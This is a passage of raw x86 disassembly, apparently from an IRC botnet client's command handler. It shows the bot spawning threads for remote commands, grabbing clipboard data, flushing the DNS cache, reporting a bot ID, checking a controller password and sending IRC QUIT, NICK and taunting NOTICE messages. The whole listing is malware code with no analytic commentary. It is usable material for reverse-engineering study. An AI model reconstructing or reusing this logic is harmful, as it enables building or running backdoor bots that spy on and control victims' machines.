lea eax, [ebp+var_2DC]
push 3
push eax
call sub_416D5A
add esp, 20h
mov [ebp+var_574], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_90C]
push ebx
push eax
push offset sub_405AF2
push ebx
push ebx
call ds:dword_4240A0 ; CreateThread
mov ecx, [ebp+var_574]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4450D4[ecx], eax
jz short loc_414391
loc_41437B: ; CODE XREF: sub_40EE72+551D�j
cmp [ebp+var_560], ebx
jnz loc_4144E3
push 32h
call ds:dword_424064 ; Sleep
jmp short loc_41437B
; ---------------------------------------------------------------------------
loc_414391: ; CODE XREF: sub_40EE72+5507�j
call ds:dword_42408C ; RtlGetLastWin32Error
push eax
push offset unk_435AF0
jmp loc_4144D4
; ---------------------------------------------------------------------------
loc_4143A2: ; CODE XREF: sub_40EE72+18A3�j
; sub_40EE72+18B8�j
mov edi, [ebp+esi+var_90]
cmp edi, ebx
jz short loc_4143C1
push edi
call sub_41781F
test eax, eax
pop ecx
jz short loc_4143C1
push edi
call sub_41781F
pop ecx
jmp short loc_4143C6
; ---------------------------------------------------------------------------
loc_4143C1: ; CODE XREF: sub_40EE72+5539�j
; sub_40EE72+5544�j
mov eax, ds:dword_42F5B4
loc_4143C6: ; CODE XREF: sub_40EE72+554D�j
mov [ebp+var_578], eax
mov eax, [ebp+esi+var_8C]
cmp eax, ebx
jnz short loc_4143DD
lea eax, [ebp+var_D8]
loc_4143DD: ; CODE XREF: sub_40EE72+5563�j
push eax
lea eax, [ebp+var_6B8]
push 40h
push eax
call sub_41782A
mov esi, [ebp+esi+var_88]
add esp, 0Ch
cmp esi, ebx
jnz short loc_4143FF
mov esi, offset byte_43C80C
loc_4143FF: ; CODE XREF: sub_40EE72+5586�j
push esi
lea eax, [ebp+var_678]
push 100h
push eax
call sub_41782A
add esp, 0Ch
lea eax, [ebp+var_738]
push [ebp+var_8C]
push 80h
push eax
call sub_41782A
mov eax, [ebp+var_8]
mov esi, [ebp+arg_4]
mov edi, [ebp+var_4]
add esp, 0Ch
mov [ebp+var_564], eax
lea eax, [ebp+var_6B8]
push eax
mov [ebp+var_73C], esi
push [ebp+var_578]
mov [ebp+var_568], edi
push esi
call sub_40AEE0
pop ecx
push eax
lea eax, [ebp+var_2DC]
push offset dword_435AA4
push eax
call sub_4172AE
push ebx
lea eax, [ebp+var_2DC]
push 6
push eax
call sub_416D5A
add esp, 20h
mov [ebp+var_574], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_73C]
push ebx
push eax
push offset sub_41570C
push ebx
push ebx
call ds:dword_4240A0 ; CreateThread
mov ecx, [ebp+var_574]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4450D4[ecx], eax
jz short loc_4144C8
loc_4144B6: ; CODE XREF: sub_40EE72+5654�j
cmp [ebp+var_560], ebx
jnz short loc_4144E3
push 32h
call ds:dword_424064 ; Sleep
jmp short loc_4144B6
; ---------------------------------------------------------------------------
loc_4144C8: ; CODE XREF: sub_40EE72+5642�j
call ds:dword_42408C ; RtlGetLastWin32Error
push eax
push offset dword_435A58
loc_4144D4: ; CODE XREF: sub_40EE72+3625�j
; sub_40EE72+3722�j ...
lea eax, [ebp+var_2DC]
push eax
call sub_4172AE
add esp, 0Ch
loc_4144E3: ; CODE XREF: sub_40EE72+3609�j
; sub_40EE72+3706�j ...
cmp [ebp+var_8], ebx
jnz loc_414E0F
push ebx
push edi
jmp loc_411D2F
; ---------------------------------------------------------------------------
loc_4144F3: ; CODE XREF: sub_40EE72+1879�j
; sub_40EE72+188E�j
mov esi, [ebp+esi+var_90]
cmp esi, ebx
jz short loc_414506
push esi
call sub_41781F
jmp short loc_41450D
; ---------------------------------------------------------------------------
loc_414506: ; CODE XREF: sub_40EE72+568A�j
push 8
call sub_416FC1
loc_41450D: ; CODE XREF: sub_40EE72+5692�j
cmp eax, ebx
pop ecx
jz loc_414F45
push eax
push [ebp+var_4]
push [ebp+var_8C]
push [ebp+arg_4]
call sub_4071DB
loc_414528: ; CODE XREF: sub_40EE72+5B65�j
add esp, 10h
jmp loc_414F45
; ---------------------------------------------------------------------------
loc_414530: ; CODE XREF: sub_40EE72+184F�j
; sub_40EE72+1864�j
mov eax, ds:dword_43F590
cmp eax, ebx
jz short loc_41454D
call eax ; DnsFlushResolverCache
test eax, eax
jz short loc_414546
push offset unk_435A24
jmp short loc_414562
; ---------------------------------------------------------------------------
loc_414546: ; CODE XREF: sub_40EE72+56CB�j
push offset unk_4359E8
jmp short loc_414562
; ---------------------------------------------------------------------------
loc_41454D: ; CODE XREF: sub_40EE72+56C5�j
push offset unk_4359AC
jmp short loc_414562
; ---------------------------------------------------------------------------
loc_414554: ; CODE XREF: sub_40EE72+1825�j
; sub_40EE72+183A�j
call sub_40AE02
test eax, eax
jz short loc_414578
push offset unk_435978
loc_414562: ; CODE XREF: sub_40EE72+4AFC�j
; sub_40EE72+56D2�j ...
lea eax, [ebp+var_2DC]
push 200h
push eax
call sub_41782A
jmp loc_4110BD
; ---------------------------------------------------------------------------
loc_414578: ; CODE XREF: sub_40EE72+56E9�j
push offset unk_43593C
jmp short loc_414562
; ---------------------------------------------------------------------------
loc_41457F: ; CODE XREF: sub_40EE72+17FB�j
; sub_40EE72+1810�j
cmp [ebp+var_8], ebx
jnz short loc_41459E
push ebx
push [ebp+var_4]
push offset aClipboardData ; "-[Clipboard Data]-"
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40D679
add esp, 14h
loc_41459E: ; CODE XREF: sub_40EE72+5710�j
push ebx
push [ebp+var_4]
call sub_40AABF
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40D679
push offset dword_4358FC
loc_4145BB: ; CODE XREF: sub_40EE72+5A07�j
; sub_40EE72+5A39�j
call sub_40BF6D
add esp, 18h
jmp loc_414F45
; ---------------------------------------------------------------------------
loc_4145C8: ; CODE XREF: sub_40EE72+171C�j
; sub_40EE72+1731�j
push 7
call sub_416FA2
test eax, eax
pop ecx
jle short loc_4145DB
push offset dword_4358C4
jmp short loc_4145FC
; ---------------------------------------------------------------------------
loc_4145DB: ; CODE XREF: sub_40EE72+5760�j
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40B56C
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_4145F7
push offset dword_43588C
jmp short loc_4145FC
; ---------------------------------------------------------------------------
loc_4145F7: ; CODE XREF: sub_40EE72+577C�j
push offset dword_43585C
loc_4145FC: ; CODE XREF: sub_40EE72+2C51�j
; sub_40EE72+2D87�j ...
lea eax, [ebp+var_2DC]
push eax
call sub_4172AE
pop ecx
pop ecx
loc_41460A: ; CODE XREF: sub_40EE72+15C6�j
; sub_40EE72+2D61�j ...
cmp [ebp+var_8], ebx
jnz loc_414E0F
push ebx
push [ebp+var_4]
loc_414617: ; CODE XREF: sub_40EE72+3961�j
lea eax, [ebp+var_2DC]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
loc_414627: ; CODE XREF: sub_40EE72+2ECB�j
call sub_40D679
add esp, 14h
jmp loc_414E0F
; ---------------------------------------------------------------------------
loc_414634: ; CODE XREF: sub_40EE72+16F2�j
; sub_40EE72+1707�j
push [ebp+var_8]
push [ebp+var_4]
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40A4AC
jmp loc_40F236
; ---------------------------------------------------------------------------
loc_41464D: ; CODE XREF: sub_40EE72+16C8�j
; sub_40EE72+16DD�j
push [ebp+esi+var_90]
push [ebp+var_4]
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40D320
jmp loc_40F236
; ---------------------------------------------------------------------------
loc_41466A: ; CODE XREF: sub_40EE72+169E�j
; sub_40EE72+16B3�j
or edi, 0FFFFFFFFh
call ds:dword_424058 ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
mov esi, [ebp+esi+var_90]
cmp esi, ebx
mov [ebp+arg_0], eax
jz short loc_414693
push esi
call sub_41781F
pop ecx
mov edi, eax
loc_414693: ; CODE XREF: sub_40EE72+5816�j
mov eax, [ebp+arg_0]
xor edx, edx
mov ecx, 15180h
div ecx
cmp eax, edi
jnb short loc_4146AC
cmp edi, 0FFFFFFFFh
jnz loc_414F45
loc_4146AC: ; CODE XREF: sub_40EE72+582F�j
push ebx
call sub_40B721
pop ecx
push eax
lea eax, [ebp+var_2DC]
push offset dword_435834
push eax
call sub_4172AE
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40D679
lea eax, [ebp+var_2DC]
push eax
call sub_40BF6D
jmp loc_411A5D
; ---------------------------------------------------------------------------
loc_4146EF: ; CODE XREF: sub_40EE72+1674�j
; sub_40EE72+1689�j
push [ebp+var_4]
push [ebp+var_8C]
push [ebp+arg_4]
call sub_408C26
add esp, 0Ch
push offset unk_435804
jmp loc_410D38
; ---------------------------------------------------------------------------
loc_41470D: ; CODE XREF: sub_40EE72+164A�j
; sub_40EE72+165F�j
push 1Fh
call sub_416FA2
test eax, eax
pop ecx
jle short loc_414736
cmp [ebp+var_8], ebx
jnz loc_40F239
push ebx
push [ebp+var_4]
push offset unk_4357D0
push [ebp+var_8C]
jmp loc_40F7A0
; ---------------------------------------------------------------------------
loc_414736: ; CODE XREF: sub_40EE72+58A5�j
push [ebp+var_8C]
lea eax, [ebp+var_4F0]
push 80h
push eax
call sub_41782A
mov eax, [ebp+arg_4]
mov esi, [ebp+esi+var_90]
mov [ebp+var_4F4], eax
mov eax, [ebp+var_4]
mov [ebp+var_468], eax
mov eax, [ebp+var_8]
add esp, 0Ch
cmp esi, ebx
mov [ebp+var_464], eax
mov [ebp+var_46C], ebx
jz short loc_414797
push esi
push offset aFull ; "full"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_414797
mov [ebp+var_46C], 1
loc_414797: ; CODE XREF: sub_40EE72+5908�j
; sub_40EE72+5919�j
lea eax, [ebp+var_2DC]
push offset dword_435798
push eax
call sub_4172AE
push ebx
lea eax, [ebp+var_2DC]
push 1Fh
push eax
call sub_416D5A
add esp, 14h
mov [ebp+var_470], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_4F4]
push ebx
push eax
push offset sub_415339
push ebx
push ebx
call ds:dword_4240A0 ; CreateThread
mov ecx, [ebp+var_470]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4450D4[ecx], eax
jz short loc_414805
loc_4147EF: ; CODE XREF: sub_40EE72+5991�j
cmp [ebp+var_460], ebx
jnz loc_414E0F
push 32h
call ds:dword_424064 ; Sleep
jmp short loc_4147EF
; ---------------------------------------------------------------------------
loc_414805: ; CODE XREF: sub_40EE72+597B�j
call ds:dword_42408C ; RtlGetLastWin32Error
push eax
push offset unk_435748
jmp loc_414E00
; ---------------------------------------------------------------------------
loc_414816: ; CODE XREF: sub_40EE72+1620�j
; sub_40EE72+1635�j
cmp [ebp+var_8], ebx
jnz short loc_414835
push ebx
push [ebp+var_4]
push offset dword_435720
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40D679
add esp, 14h
loc_414835: ; CODE XREF: sub_40EE72+59A7�j
push [ebp+arg_4]
call ds:dword_43F700 ; closesocket
call ds:dword_43F5C8 ; WSACleanup
call sub_40AC42
push ebx
call ds:off_42414C
loc_414850: ; CODE XREF: sub_40EE72+15F6�j
; sub_40EE72+160B�j
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push [ebp+arg_4]
push eax
call sub_40B8D8
pop ecx
pop ecx
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40D679
push offset dword_4356F8
jmp loc_4145BB
; ---------------------------------------------------------------------------
loc_41487E: ; CODE XREF: sub_40EE72+14BC�j
; sub_40EE72+14D1�j
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push [ebp+arg_4]
push [ebp+arg_1C]
push eax
call sub_40BB8C
add esp, 0Ch
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40D679
push offset dword_4356D0
jmp loc_4145BB
; ---------------------------------------------------------------------------
loc_4148B0: ; CODE XREF: sub_40EE72+1492�j
; sub_40EE72+14A7�j
push [ebp+var_8]
push [ebp+var_4]
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40C00D
jmp loc_40F236
; ---------------------------------------------------------------------------
loc_4148C9: ; CODE XREF: sub_40EE72+1468�j
; sub_40EE72+147D�j
cmp [ebp+var_C], ebx
mov [ebp+var_388], bl
jz short loc_414908
mov esi, [ebp+esi+var_90]
cmp esi, ebx
jz short loc_414908
push esi
push [ebp+var_C]
call sub_417880
pop ecx
cmp eax, ebx
pop ecx
jz short loc_414908
push eax
push offset aS_3 ; "%s"
lea eax, [ebp+var_388]
push 80h
push eax
call sub_41782A
add esp, 10h
loc_414908: ; CODE XREF: sub_40EE72+5A60�j
; sub_40EE72+5A6B�j ...
push [ebp+var_8C]
lea eax, [ebp+var_408]
push 80h
push eax
call sub_41782A
mov eax, [ebp+arg_4]
add esp, 0Ch
mov [ebp+var_40C], eax
mov eax, [ebp+var_4]
mov [ebp+var_304], eax
mov eax, [ebp+var_8]
mov [ebp+var_300], eax
lea eax, [ebp+var_2DC]
push offset dword_4356A8
push eax
call sub_4172AE
push ebx
lea eax, [ebp+var_2DC]
push 1Dh
push eax
call sub_416D5A
add esp, 14h
mov [ebp+var_308], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_40C]
push ebx
push eax
push offset sub_40C07F
push ebx
push ebx
call ds:dword_4240A0 ; CreateThread
mov ecx, [ebp+var_308]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4450D4[ecx], eax
jz short loc_4149AB
loc_414995: ; CODE XREF: sub_40EE72+5B37�j
cmp [ebp+var_2FC], ebx
jnz loc_40F239
push 32h
call ds:dword_424064 ; Sleep
jmp short loc_414995
; ---------------------------------------------------------------------------
loc_4149AB: ; CODE XREF: sub_40EE72+5B21�j
call ds:dword_42408C ; RtlGetLastWin32Error
push eax
push offset dword_435660
jmp loc_40F422
; ---------------------------------------------------------------------------
loc_4149BC: ; CODE XREF: sub_40EE72+143E�j
; sub_40EE72+1453�j
push [ebp+var_4]
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40BEF5
push offset dword_435638
call sub_40BF6D
jmp loc_414528
; ---------------------------------------------------------------------------
loc_4149DC: ; CODE XREF: sub_40EE72+1414�j
; sub_40EE72+1429�j
push [ebp+var_8C]
lea eax, [ebp+var_4F0]
push 80h
push eax
call sub_41782A
mov eax, [ebp+arg_4]
mov esi, [ebp+esi+var_90]
mov [ebp+var_4F4], eax
mov eax, [ebp+var_4]
mov [ebp+var_468], eax
mov eax, [ebp+var_8]
add esp, 0Ch
cmp esi, ebx
mov [ebp+var_464], eax
jz short loc_414A36
push offset dword_435634
push esi
call sub_4176D0
neg eax
sbb eax, eax
pop ecx
inc eax
pop ecx
mov [ebp+var_46C], eax
jmp short loc_414A3C
; ---------------------------------------------------------------------------
loc_414A36: ; CODE XREF: sub_40EE72+5BA8�j
mov [ebp+var_46C], ebx
loc_414A3C: ; CODE XREF: sub_40EE72+5BC2�j
lea eax, [ebp+var_2DC]
push offset dword_435608
push eax
call sub_4172AE
push ebx
lea eax, [ebp+var_2DC]
push 20h
push eax
call sub_416D5A
add esp, 14h
mov [ebp+var_470], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_4F4]
push ebx
push eax
push offset sub_416DC5
push ebx
push ebx
call ds:dword_4240A0 ; CreateThread
mov ecx, [ebp+var_470]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4450D4[ecx], eax
jz short loc_414AA6
loc_414A94: ; CODE XREF: sub_40EE72+5C32�j
cmp [ebp+var_460], ebx
jnz short loc_414AC1
push 32h
call ds:dword_424064 ; Sleep
jmp short loc_414A94
; ---------------------------------------------------------------------------
loc_414AA6: ; CODE XREF: sub_40EE72+5C20�j
call ds:dword_42408C ; RtlGetLastWin32Error
push eax
push offset dword_4355C0
loc_414AB2: ; CODE XREF: sub_40EE72+489D�j
; sub_40EE72+49B9�j
lea eax, [ebp+var_2DC]
push eax
call sub_4172AE
add esp, 0Ch
loc_414AC1: ; CODE XREF: sub_40EE72+4527�j
; sub_40EE72+453F�j ...
lea eax, [ebp+var_2DC]
push eax
jmp loc_410654
; ---------------------------------------------------------------------------
loc_414ACD: ; CODE XREF: sub_40EE72+1398�j
; sub_40EE72+13AD�j
push offset aBotid ; "botid"
push offset dword_435598
jmp short loc_414AEB
; ---------------------------------------------------------------------------
loc_414AD9: ; CODE XREF: sub_40EE72+136E�j
; sub_40EE72+1383�j
push ds:dword_489C50
call sub_40B721
pop ecx
push eax
push offset dword_43555C
loc_414AEB: ; CODE XREF: sub_40EE72+5C65�j
lea eax, [ebp+var_2DC]
push eax
call sub_4172AE
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40D679
add esp, 20h
jmp loc_4110FD
; ---------------------------------------------------------------------------
loc_414B18: ; CODE XREF: sub_40EE72+1344�j
; sub_40EE72+1359�j
mov esi, [ebp+esi+var_90]
cmp esi, ebx
jz short loc_414B4A
cmp [ebp+var_C], ebx
jz short loc_414B59
push esi
push [ebp+var_C]
call sub_417880
pop ecx
cmp eax, ebx
pop ecx
jz short loc_414B59
push eax
push offset aQuitS ; "QUIT :%s\r\n"
push [ebp+arg_4]
call sub_40D633
add esp, 0Ch
jmp short loc_414B59
; ---------------------------------------------------------------------------
loc_414B4A: ; CODE XREF: sub_40EE72+5CAF�j
push offset aQuitLater ; "QUIT :later\r\n"
push [ebp+arg_4]
call sub_40D633
pop ecx
pop ecx
loc_414B59: ; CODE XREF: sub_40EE72+5CB4�j
; sub_40EE72+5CC3�j ...
push 0FFFFFFFEh
jmp loc_40F23B
; ---------------------------------------------------------------------------
loc_414B60: ; CODE XREF: sub_40EE72+131A�j
; sub_40EE72+132F�j
push offset aQuitDisconnect ; "QUIT :disconnecting\r\n"
push [ebp+arg_4]
call sub_40D633
push offset dword_43550C
call sub_40BF6D
add esp, 0Ch
or eax, 0FFFFFFFFh
jmp loc_40F23C
; ---------------------------------------------------------------------------
loc_414B82: ; CODE XREF: sub_40EE72+12F0�j
; sub_40EE72+1305�j
push offset aQuitReconnecti ; "QUIT :reconnecting\r\n"
push [ebp+arg_4]
call sub_40D633
push offset dword_4354CC
call sub_40BF6D
add esp, 0Ch
xor eax, eax
jmp loc_40F23C
; ---------------------------------------------------------------------------
loc_414BA3: ; CODE XREF: sub_40EE72+12C6�j
; sub_40EE72+12DB�j
push [ebp+var_4]
push [ebp+var_8C]
push [ebp+arg_4]
call sub_407110
jmp loc_412FF4
; ---------------------------------------------------------------------------
loc_414BB9: ; CODE XREF: sub_40EE72+1221�j
; sub_40EE72+1236�j
push [ebp+esi+var_90]
push 1Fh
push offset dword_4354BC
push offset dword_4354B0
jmp loc_40FED3
; ---------------------------------------------------------------------------
loc_414BD1: ; CODE XREF: sub_40EE72+11F7�j
; sub_40EE72+120C�j
push [ebp+esi+var_90]
push 1Ch
push offset dword_4354A4
push offset dword_435494
jmp loc_40FED3
; ---------------------------------------------------------------------------
loc_414BE9: ; CODE XREF: sub_40EE72+1022�j
; sub_40EE72+1037�j
mov edi, [ebp+esi+var_90]
cmp edi, ebx
jz short loc_414C08
push edi
call sub_41781F
test eax, eax
pop ecx
jz short loc_414C08
push edi
call sub_41781F
pop ecx
jmp short loc_414C0D
; ---------------------------------------------------------------------------
loc_414C08: ; CODE XREF: sub_40EE72+5D80�j
; sub_40EE72+5D8B�j
mov eax, ds:dword_42F5A8
loc_414C0D: ; CODE XREF: sub_40EE72+5D94�j
mov esi, [ebp+esi+var_8C]
mov [ebp+var_478], eax
cmp esi, ebx
jz short loc_414C32
push esi
loc_414C1F: ; CODE XREF: sub_40EE72+5DCF�j
lea eax, [ebp+var_488]
push 10h
push eax
call sub_41782A
add esp, 0Ch
jmp short loc_414C49
; ---------------------------------------------------------------------------
loc_414C32: ; CODE XREF: sub_40EE72+5DAA�j
cmp [ebp+var_9C7], bl
jz short loc_414C43
lea eax, [ebp+var_D8]
push eax
jmp short loc_414C1F
; ---------------------------------------------------------------------------
loc_414C43: ; CODE XREF: sub_40EE72+5DC6�j
mov [ebp+var_488], bl
loc_414C49: ; CODE XREF: sub_40EE72+5DBE�j
mov eax, [ebp+var_4]
push [ebp+var_8C]
mov esi, [ebp+arg_4]
mov [ebp+var_46C], eax
mov eax, [ebp+var_8]
push 80h
mov [ebp+var_468], eax
lea eax, [ebp+var_508]
push eax
mov [ebp+var_50C], esi
call sub_41782A
add esp, 0Ch
push [ebp+var_478]
push esi
call sub_40AEE0
pop ecx
push eax
lea eax, [ebp+var_2DC]
push offset unk_42B75C
push eax
call sub_4172AE
push ebx
lea eax, [ebp+var_2DC]
push 11h
push eax
call sub_416D5A
add esp, 1Ch
mov [ebp+var_474], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_50C]
push ebx
push eax
push offset sub_407FEA
push ebx
push ebx
call ds:dword_4240A0 ; CreateThread
mov ecx, [ebp+var_474]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4450D4[ecx], eax
jz short loc_414CFA
loc_414CE4: ; CODE XREF: sub_40EE72+5E86�j
cmp [ebp+var_464], ebx
jnz loc_40F239
push 32h
call ds:dword_424064 ; Sleep
jmp short loc_414CE4
; ---------------------------------------------------------------------------
loc_414CFA: ; CODE XREF: sub_40EE72+5E70�j
call ds:dword_42408C ; RtlGetLastWin32Error
push eax
push offset unk_43544C
jmp loc_40F422
; ---------------------------------------------------------------------------
loc_414D0B: ; CODE XREF: sub_40EE72+FCE�j
; sub_40EE72+FE3�j ...
push edi
push offset aSecure ; "secure"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz short loc_414D33
push edi
push offset aSec ; "sec"
call sub_4176D0
pop ecx
mov [ebp+var_46C], ebx
test eax, eax
pop ecx
jnz short loc_414D3D
loc_414D33: ; CODE XREF: sub_40EE72+5EA8�j
mov [ebp+var_46C], 1
loc_414D3D: ; CODE XREF: sub_40EE72+5EBF�j
push [ebp+var_8C]
lea eax, [ebp+var_4F0]
push 80h
push eax
call sub_41782A
mov eax, [ebp+arg_4]
add esp, 0Ch
cmp [ebp+var_46C], ebx
mov [ebp+var_4F4], eax
mov eax, [ebp+var_4]
mov [ebp+var_468], eax
mov eax, [ebp+var_8]
mov [ebp+var_464], eax
mov eax, offset aSecuring ; "Securing"
jnz short loc_414D84
mov eax, offset aUnsecuring ; "Unsecuring"
loc_414D84: ; CODE XREF: sub_40EE72+5F0B�j
push eax
push offset dword_435400
lea eax, [ebp+var_2DC]
push 200h
push eax
call sub_41782A
push ebx
lea eax, [ebp+var_2DC]
push 1Ah
push eax
call sub_416D5A
add esp, 1Ch
mov [ebp+var_470], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_4F4]
push ebx
push eax
push offset sub_415F26
push ebx
push ebx
call ds:dword_4240A0 ; CreateThread
mov ecx, [ebp+var_470]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4450D4[ecx], eax
jz short loc_414DF4
loc_414DE2: ; CODE XREF: sub_40EE72+5F80�j
cmp [ebp+var_460], ebx
jnz short loc_414E0F
push 32h
call ds:dword_424064 ; Sleep
jmp short loc_414DE2
; ---------------------------------------------------------------------------
loc_414DF4: ; CODE XREF: sub_40EE72+5F6E�j
call ds:dword_42408C ; RtlGetLastWin32Error
push eax
push offset unk_4353B4
loc_414E00: ; CODE XREF: sub_40EE72+3DA5�j
; sub_40EE72+4AC1�j ...
lea eax, [ebp+var_2DC]
push eax
call sub_4172AE
add esp, 0Ch
loc_414E0F: ; CODE XREF: sub_40EE72+2EB3�j
; sub_40EE72+3959�j ...
lea eax, [ebp+var_2DC]
push eax
call sub_40BF6D
jmp loc_40F428
; ---------------------------------------------------------------------------
loc_414E20: ; CODE XREF: sub_40EE72+FA4�j
; sub_40EE72+FB9�j
push offset aAbosal7Tool ; "ABOSAL7 tool"
push offset dword_435394
jmp loc_4110B1
; ---------------------------------------------------------------------------
loc_414E2F: ; CODE XREF: sub_40EE72+F7A�j
; sub_40EE72+F8F�j
mov esi, [ebp+esi+var_90]
cmp esi, ebx
jz short loc_414E8F
push esi
call sub_41781F
cmp eax, ebx
pop ecx
jl short loc_414E84
cmp eax, 2
jge short loc_414E84
mov edx, [ebp+arg_18]
mov ecx, eax
shl ecx, 7
cmp [ecx+edx], bl
lea esi, [ecx+edx]
jz short loc_414E79
lea eax, [esi+1]
push eax
lea eax, [ebp+var_2DC]
push offset dword_438738
push eax
call sub_4172AE
add esp, 0Ch
mov [esi], bl
jmp loc_410E57
; ---------------------------------------------------------------------------
loc_414E79: ; CODE XREF: sub_40EE72+5FE6�j
push eax
push offset dword_435358
jmp loc_410E48
; ---------------------------------------------------------------------------
loc_414E84: ; CODE XREF: sub_40EE72+5FD1�j
; sub_40EE72+5FD6�j
push eax
push offset dword_43531C
jmp loc_410E48
; ---------------------------------------------------------------------------
loc_414E8F: ; CODE XREF: sub_40EE72+5FC6�j
mov edi, [ebp+arg_18]
xor esi, esi
loc_414E94: ; CODE XREF: sub_40EE72+603E�j
push [ebp+var_94]
push edi
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz short loc_414EB7
inc esi
add edi, 80h
cmp esi, 2
jl short loc_414E94
jmp loc_410E57
; ---------------------------------------------------------------------------
loc_414EB7: ; CODE XREF: sub_40EE72+6032�j
mov eax, [ebp+arg_18]
shl esi, 7
mov [esi+eax], bl
lea eax, [ebp+var_D8]
push eax
push offset dword_438738
jmp loc_410E48
; ---------------------------------------------------------------------------
loc_414ED1: ; CODE XREF: sub_40EE72+F50�j
; sub_40EE72+F65�j
push [ebp+var_90]
push offset dword_4386A8
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz short loc_414F45
call sub_416F23
push ebx
call ds:off_42414C
loc_414EF3: ; CODE XREF: sub_40EE72+F26�j
; sub_40EE72+F3B�j
push [ebp+esi+var_90]
xor eax, eax
cmp [ebp+var_9B8], bl
setnz al
push eax
lea eax, [ebp+var_928]
push ds:dword_42F5CC
push eax
call sub_415CFF
add esp, 10h
lea eax, [ebp+var_928]
push eax
push offset aNickS ; "NICK %s\r\n"
push [ebp+arg_4]
call sub_40D633
add esp, 0Ch
lea eax, [ebp+var_928]
push eax
push offset dword_4352E8
loc_414F3E: ; CODE XREF: sub_40EE72+4344�j
; sub_40EE72+49D7�j ...
call sub_40BFE1
pop ecx
loc_414F44: ; CODE XREF: sub_40EE72+17E7�j
pop ecx
loc_414F45: ; CODE XREF: sub_40EE72+65F�j
; sub_40EE72+66B�j ...
mov eax, [ebp+arg_24]
jmp loc_40F23C
; ---------------------------------------------------------------------------
loc_414F4D: ; CODE XREF: sub_40EE72+B28�j
; sub_40EE72+B3B�j
mov esi, [ebp+esi+var_90]
cmp esi, ebx
mov [ebp+arg_0], esi
jz loc_40F239
cmp [ebp+var_AC], ebx
jnz loc_40F239
push offset asc_4387B4 ; "!"
push [ebp+var_94]
call sub_418B6E
mov esi, eax
push offset dword_43C824
push ebx
inc esi
call sub_418B6E
push offset asc_4352E4 ; "~"
push eax
call sub_418B6E
push [ebp+arg_0]
mov edi, eax
push offset aCool ; "cool"
call sub_4176D0
add esp, 20h
test eax, eax
jz short loc_414FEC
lea eax, [ebp+var_D8]
push edi
push eax
lea eax, [ebp+var_D8]
push eax
push offset aNoticeSNiceTry ; "NOTICE %s :Nice try, idiot. (%s!%s).\r\n"
push [ebp+arg_4]
call sub_40D633
add esp, 14h
lea eax, [ebp+var_D8]
push eax
push offset aNoticeSYouVeBe ; "NOTICE %s :You've been logged.\r\n"
push [ebp+arg_4]
call sub_40D633
add esp, 0Ch
push edi
push esi
push offset dword_43525C
jmp loc_40F813
; ---------------------------------------------------------------------------
loc_414FEC: ; CODE XREF: sub_40EE72+6136�j
mov [ebp+arg_24], offset off_42F6C8
loc_414FF3: ; CODE XREF: sub_40EE72+619D�j
mov eax, [ebp+arg_24]
push edi
push dword ptr [eax]
call sub_4170B3
pop ecx
test eax, eax
pop ecx
jnz short loc_415053
add [ebp+arg_24], 4
cmp [ebp+arg_24], offset off_42F6CC
jb short loc_414FF3
lea eax, [ebp+var_D8]
push edi
push eax
lea eax, [ebp+var_D8]
push eax
push offset aNoticeSNiceTry ; "NOTICE %s :Nice try, idiot. (%s!%s).\r\n"
push [ebp+arg_4]
call sub_40D633
add esp, 14h
lea eax, [ebp+var_D8]
push eax
push offset aNoticeSYouVeBe ; "NOTICE %s :You've been logged.\r\n"
push [ebp+arg_4]
call sub_40D633
add esp, 0Ch
push edi
push esi
push offset dword_435220
jmp loc_40F813
; ---------------------------------------------------------------------------
loc_415053: ; CODE XREF: sub_40EE72+6190�j
mov edi, [ebp+arg_18]
xor esi, esi
loc_415058: ; CODE XREF: sub_40EE72+6210�j
cmp [ebp+arg_0], ebx
jz loc_40F239
cmp [edi], bl
jnz short loc_415078
push [ebp+arg_0]
push offset aCool ; "cool"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz short loc_415089
loc_415078: ; CODE XREF: sub_40EE72+61F1�j
inc esi
add edi, 80h
cmp esi, 2
jl short loc_415058
jmp loc_40F239
; ---------------------------------------------------------------------------
loc_415089: ; CODE XREF: sub_40EE72+6204�j
shl esi, 7
add esi, [ebp+arg_18]
lea eax, [ebp+var_AA8]
push 7Fh
push eax
push esi
call sub_418C10
add esp, 0Ch
cmp [ebp+var_8], ebx
jnz short loc_4150C0
push ebx
push [ebp+var_4]
push offset dword_4351F4
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40D679
add esp, 14h
